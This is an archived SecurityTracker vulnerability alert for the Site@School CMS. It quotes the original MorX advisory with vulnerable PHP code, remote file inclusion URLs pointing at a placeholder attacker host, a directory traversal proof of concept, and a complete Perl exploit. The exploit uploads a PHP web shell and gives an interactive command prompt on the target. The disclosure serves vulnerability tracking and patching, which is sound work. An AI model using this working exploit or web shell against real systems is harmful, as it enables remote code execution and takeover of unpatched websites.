SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Forum/Board/Portal)  >   Site@School Vendors:   siteatschool.sourceforge.net
Site@School Input Validation Flaws Let Remote Users View Files and Execute Arbitrary Code
SecurityTracker Alert ID:  1016887
SecurityTracker URL:  http://securitytracker.com/id/1016887
CVE Reference:   CVE-2006-4919, CVE-2006-4920, CVE-2006-4921, CVE-2006-4922   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 20 2006
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.4.02 and prior versions
Description:   A vulnerability was reported in Site@School. A remote user can include and execute arbitrary code on the target system. A remote user can view files on the target system.

The 'starnet/modules/sn_allbum/slideshow.php' script does not properly validate user-supplied input in the 'cmsdir' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Other files are also affected, including 'starnet/modules/include/include.php' and 'starnet/themes/editable/main.inc.php'.

The 'starnet/editors/htmlarea/popups/images.php' script does not properly validate user-supplied input in the 'dir' parameter. A remote user can supply a specially crafted request to view files on target system.

A demonstration exploit URL is provided:

http://[target]/starnet/editors/htmlarea/popups/images.php?dir=../../

A remote user can exploit 'starnet/editors/htmlarea/popups/images.php' to upload arbitrary PHP code. The PHP code can then be executed via the web server.

The vendor was notified on August 5, 2006.

Simo64 discovered this vulnerability.

The original advisory is available at:

http://www.morx.org/school.txt

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can view files on the target system.

Solution:   The vendor has issued a fixed version (2.4.03).
Vendor URL:  siteatschool.sourceforge.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Fri, 15 Sep 2006 15:09:01 +0000
Subject:  Site@School 2.4.02 and below Multiple remote Command Execution

# Title: Site@School 2.4.02 and below Multiple remote Command Execution Vulnerabilities

# Vendor: Site@School

# webiste : http://siteatschool.sourceforge.net/ 

# Version : <= 2.4.02

# Severity: Critical 

# Discovered by: Simo64 <simo64_at_morx_org> 

# Exploit writting by: Simo Ben youssef <simo_at_morx_org>  

# Discovered: 05 Aout 2006

# Published : 15 September 2006

# MorX Security Research Team

# http://www.morx.org 

# Original File: http://www.morx.org/school.txt


# Details


# Remote File Inclsuion :


# vulnerable code in starnet/modules/sn_allbum/slideshow.php near line 39 - 46:


# [code]

# ------------------------------------------------------------------

# if(file_exists("$cmsdir/languages/$language/sn_allbum/$language.php")) 

# {

# 	  include("$cmsdir/languages/$language/sn_allbum/$language.php");

# } 

# else 

# {

#	 include("$cmsdir/languages/EN/sn_allbum/EN.php");

# }

# -------------------------------------------------------------------[/code]


# vulnerable code in line 91 :


# [code]

# ----------------------------------------------------------------

#	 include("$cmsdir/themes/$themelocation/".$content_parm[0]); 

# ------------------------------------------------------------------[/code]


# $cmsdir is not properly verified ,can be used to include files from remote

# resources witch would allow a remote attacker to execute arbitary command with the # privilege of the webserver


# Note : multiple files are affected !


# Exploit : 


# http://localhost/starnet/modules/sn_allbum/slideshow.php?cmsdir=http://attacker/evilscript.txt?cmd=ls

# http://localhost/starnet/modules/include/include.php?cmsdir=http://attacker/evilscript.txt?cmd=ls

# http://localhost/starnet/themes/editable/main.inc.php?cmsdir=http://attacker/evilscript.txt?cmd=ls



# =======================

# Directory Traversal   :

# =======================


# PoC :


# http://localhost/starnet/editors/htmlarea/popups/images.php?dir=../../


# =======================

# Arbitary File Upload  :

# =======================


# vulnerable code in starnet/editors/htmlarea/popups/images.php near lines 58 - 104


# [code]

# ----------------------------------------------------------

# $BASE_DIR = $server_path;

# $BASE_ROOT = $user_path.'/'.$media ;


# if(isset($_FILES['upload']) && is_array($_FILES['upload']) && isset($_POST['dirPath'])) 

# {


#	 $dirPathPost = $_POST['dirPath'];

#	 if(strlen($dirPathPost) > 0) 

#	 {

#		 if(substr($dirPathPost,0,1)=='/') 

#			 $IMG_ROOT .= $dirPathPost;		

#		 else

#			 $IMG_ROOT = $dirPathPost;			

#	 }


#	 if(strrpos($IMG_ROOT, '/')!= strlen($IMG_ROOT)-1) 

#		 $IMG_ROOT .= '/';


#	 do_upload($_FILES['upload'], $BASE_DIR.$BASE_ROOT.$dirPathPost.'/');

# }


# /*[morx] do_upload function code [/morx]*/



# function do_upload($file, $dest_dir) 

# {

# 	global $clearUploads, $perm;


# 	if(is_file($file['tmp_name'])) 

#	 {  

#         # Remove spaces, apostrophe, exclamation marks etc.

#         $str_from = " \'@!,/\\\t\*?`\"" ;

#         $str_to = str_repeat("_",strlen($str_from));

#         $file_name = strtr($file['name'],$str_from,$str_to);  

#		 //var_dump($file); echo "DIR:$dest_dir";

#		 move_uploaded_file($file['tmp_name'], $dest_dir.$file_name);

#	 	 //get filepermissions from config and chmod it.

#		 eval("chmod('$dest_dir.$file_name', $perm);");

#	 }


#	 $clearUploads = true;

# }


# ---------------------------------------------------------[/code]


# the first problem is that starnet/editors/htmlarea/popups/images.php is accessible

# directelly to any user without any authentificagtion , 

# the second problem is that the script doesn't verify thefile extension so an attacker needs just to complete the

# condition in line 88 to upload a malicious script


# Disclosure History:


# 05 Aout 2006 : Discovered

# 05 Aout 2006 : Contacted Vendor with vulnerabilities information

# 23 Aout 2006 : Vendor released 2.4.03


# Patch:


# Upgrade to the latest version.


# Exploit :

# =========

# [code]


# C:\>perl school.pl localhost


# --- Site@school remote file upload Xploit

# --- Writting By Simo ben youssef / Simo_at_morx_org

# --- MorX Security Research Team

# --- www.morx.org


# [*] checking if zebi.php was successfully uploaded ...

# [+] zebi.php was successfully uploaded


# ####################################

# ####     ET VOILA, YOU ARE IN  #####

# ####################################


# Linux localhost 2.6.12.6-xenU #1 SMP Sun Dec 4 20:49:44 GMT 2005 x86_64 GNU/Linux


# uid=33(www-data) gid=33(www-data) groups=33(www-data)


# [www-data@localhost:]#exit

# Connection Closed


use IO::Socket;

use LWP::Simple;


if(!defined($ARGV[0])) {


print "\n--- Site\@school remote file upload Xploit\n";

print "--- Writting By Simo ben youssef / Simo_at_morx_org\n";

print "--- MorX Security Research Team\n";

print "--- www.morx.org\n\n";


print "--- Usage:   perl $0 <host>\n";

print "--- Example: perl $0 localhost\n\n";

exit; }


$TARGET = $ARGV[0];

$PORT   = "80";

$SCRIPT = "starnet/editors/htmlarea/popups/images.php";

$SHELL  = "/starnet/media/zebi.php?cmd=";

$HTTP   = "http://";



$COMMAND1 = "POST /$SCRIPT HTTP/1.1";

$COMMAND2 = "Accept: image/gif, image/x-xbitmap, image/jpeg,  image/pjpeg, application/x-shockwave-flash, */*";

$COMMAND3 = "Accept-Language: en-us";

$COMMAND4 = "Content-Type: multipart/form-data; boundary=-------- -------------------7d62e2819048c2";

$COMMAND5 = "Accept-Encoding: gzip, deflate";

$COMMAND6 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;  Windows NT 5.1)";

$COMMAND7 = "Host: $TARGET";

$COMMAND8 = "Content-Length: 438";

$COMMAND9 = "Connection: Keep-Alive";

$COMMAND9a = "Cache-Control: no-cache";

$COMMAND10 = "-----------------------------7d62e2819048c2";

$COMMAND11 = 'Content-Disposition: form-data; name="dirPath"';

$COMMAND12 = "/";

$COMMAND13 = 'Content-Disposition: form-data; name="upload";  filename="C:\zebi.php"';

$COMMAND14 = "Content-Type: application/octet-stream";

$COMMAND15 = "<? system(\$_GET['cmd']\);exit; ?>";

$COMMAND16 = 'Content-Disposition: form-data; name="upload"';

$COMMAND17 = "Upload";

$COMMAND18 = "-----------------------------7d62e2819048c2--";

$COMMAND19 = "HEAD /starnet/media/zebi.php HTTP/1.1";


$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$TARGET" ,PeerPort=>"$PORT")

|| die "Can't connect to $TARGET";


print "\n--- Site\@school remote file upload Xploit\n";

print "--- Writting By Simo ben youssef / Simo_at_morx_org\n";

print "--- MorX Security Research Team\n";

print "--- www.morx.org\n\n";



print "[*] Trying to upload zebi.php ...\n\n";


sleep 2;

print $remote "$COMMAND1\n$COMMAND2\n$COMMAND3\n$COMMAND4\n$COMMAND5\n$COMMAND6\n$COMMAND7\n$COMMAND8\n$COMMAND9\n$COMMAND9a\n\n";


print $remote "$COMMAND10\n$COMMAND11\n\n$COMMAND12\n$COMMAND10\n$COMMAND13\n$COMMAND14\n\n$COMMAND15\n$COMMAND10\n$COMMAND16\n\n$COMMAND17\n$COMMAND18\n\n";


print "[*] checking if zebi.php was successfully uploaded ...\n";


print $remote "$COMMAND19\n$COMMAND7\n$COMMAND9\n$COMMAND9a\n\n";


while ($output = <$remote> ) {

if ($output =~ /200 OK/) {

print "[+] zebi.php was successfully uploaded\n\n";


$cmd2   = "uname -n";

$cmd3   = "whoami";

$cmd4   = "uname -a";

$cmd5   = "id";

$unamea = "$HTTP$TARGET$SHELL$cmd4";

$id     = "$HTTP$TARGET$SHELL$cmd5";

$uname  = "$HTTP$TARGET$SHELL$cmd2";

$whoami = "$HTTP$TARGET$SHELL$cmd3";

$w      = get($whoami);

$u      = get($uname);

chomp($w);

chomp($u);

$ua     = get($unamea);

$i      = get($id);

print "####################################\n";

print "####     ET VOILA, YOU ARE IN  #####\n";

print "####################################\n\n";


print "$ua\n$i";


while () {


print "\n[$w\@$u:]#";


chomp($cmd=<STDIN>);

if ($cmd eq "exit") 

{ 

print "Connection Closed\n";

$remote->flush();

close($remote);

exit;

}


$LEHWA   = "$HTTP$TARGET$SHELL$cmd";


if($cmd eq "")

{ 

print "empty command ! for help, type help\n"; }

else

{ 

getprint($LEHWA)

}

}

$a = 1

}

}


if ($a == 0)

{ print "[-] failed\n";

}

$remote->flush();

close($remote);

exit;


# Disclaimer:


# This entire document is for eductional, testing and demonstrating purpose only.

# Modification use and/or publishing this information is entirely on your OWN risk.

# I cannot be held responsible for any of the above.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC